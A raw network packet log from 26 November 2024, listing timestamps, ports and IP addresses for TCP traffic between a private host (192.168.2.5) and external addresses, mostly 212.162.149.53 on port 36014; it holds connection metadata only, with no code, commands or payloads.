Nov 26, 2024 09:01:29.841984034 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842045069 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842056036 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842149019 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842159033 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842240095 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842258930 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842340946 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842360020 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842467070 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842485905 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842596054 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.842936993 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.843018055 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.958554983 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.958791971 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.958832979 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.958954096 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.958991051 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959140062 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959156036 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959249973 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959275007 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959450006 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959491014 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959621906 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959727049 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959738016 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959754944 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959831953 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.959928989 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960028887 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960037947 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960180998 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960220098 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960330009 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960354090 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960402012 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960442066 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960558891 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960608959 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960866928 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960875034 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.960963011 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961015940 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961064100 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961095095 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961214066 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961231947 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961349964 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961369991 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961436033 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961483955 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961590052 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961615086 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961738110 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961767912 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961946964 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.961966038 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.962131977 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.962141037 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.962240934 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.962295055 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.962402105 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.962412119 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.962569952 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.962610006 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.962764025 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963177919 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963218927 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963339090 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.963365078 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963375092 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963424921 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.963491917 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963501930 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963543892 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963572979 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963618994 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963670015 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963789940 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963800907 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963980913 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.963993073 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964167118 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964175940 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964325905 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964339018 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964436054 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964478970 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964621067 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964629889 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964730978 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964775085 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964852095 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964905977 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.964953899 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965010881 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965101957 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965131044 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965233088 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965276957 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965405941 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965459108 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965548992 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965570927 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965692043 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965723038 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965799093 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965817928 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965959072 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.965977907 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966099977 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966196060 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966320038 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966330051 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966356993 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966434002 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966480017 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966542959 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966573000 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966622114 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966728926 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.966809988 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:29.967219114 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.967289925 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:29.970232964 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:30.083478928 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.083499908 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.083636999 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.083678007 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.083869934 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.083880901 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084036112 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084054947 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084150076 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084202051 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084316969 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084369898 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084454060 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084462881 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084475040 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084553003 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084635019 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084655046 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084805012 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084815025 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084892035 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084902048 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084975958 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.084986925 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085104942 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085144043 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085230112 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085241079 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085345984 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085370064 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085452080 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085494041 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085573912 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085602999 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085688114 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085699081 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085803986 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085813999 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085911989 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085922003 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085968971 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.085978985 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086086988 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086158991 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086249113 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086267948 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086354017 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086373091 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086452007 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086494923 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086535931 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086606979 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086673021 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086682081 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.086925030 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:30.087013960 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:30.087383032 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087393999 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087403059 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087413073 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087457895 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087467909 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087615967 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087625980 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087685108 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087718010 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087863922 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087877035 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087928057 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.087966919 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088007927 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088052988 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088165998 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088176966 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088202000 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088352919 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088362932 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088568926 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088581085 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088589907 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088598967 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088608980 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088682890 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088699102 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088720083 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088731050 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088771105 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088792086 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088880062 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088900089 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088947058 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.088967085 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089103937 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089112997 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089205980 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089247942 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089333057 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089343071 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089374065 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089384079 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089502096 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089512110 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089524031 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089592934 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089641094 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089693069 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089822054 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089832067 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089910030 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.089963913 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.090162992 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:30.090251923 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:30.090383053 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.158823967 CET	443	49729	104.26.12.205	192.168.2.5
Nov 26, 2024 09:01:30.158885002 CET	443	49729	104.26.12.205	192.168.2.5
Nov 26, 2024 09:01:30.158941984 CET	49729	443	192.168.2.5	104.26.12.205
Nov 26, 2024 09:01:30.159353971 CET	49729	443	192.168.2.5	104.26.12.205
Nov 26, 2024 09:01:30.207514048 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.207528114 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.207608938 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.207618952 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.207730055 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.207781076 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.207937002 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.207950115 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.207974911 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208014011 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208115101 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208129883 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208193064 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208267927 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208395004 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208405018 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208444118 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208475113 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208514929 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208523989 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208595037 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208606005 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208645105 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208713055 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208790064 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208800077 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208842039 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208904028 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208940029 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.208961964 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209011078 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209021091 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209125042 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209144115 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209220886 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209244013 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209346056 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209409952 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209500074 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209510088 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209541082 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209590912 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209681034 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209709883 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209760904 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209851980 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.209861040 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210062027 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210072994 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210082054 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210091114 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210105896 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210163116 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210220098 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210230112 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210319996 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210354090 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210369110 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:30.210480928 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210529089 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210632086 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210686922 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210767984 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210783958 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210915089 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.210927010 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211034060 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211044073 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211148977 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211160898 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211261034 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211282969 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211339951 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211386919 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211467028 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211528063 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211652994 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211663961 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211703062 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211740971 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211836100 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211859941 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.211990118 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212048054 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212129116 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212147951 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212233067 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212296963 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:30.212346077 CET	36014	49707	212.162.149.53	192.168.2.5
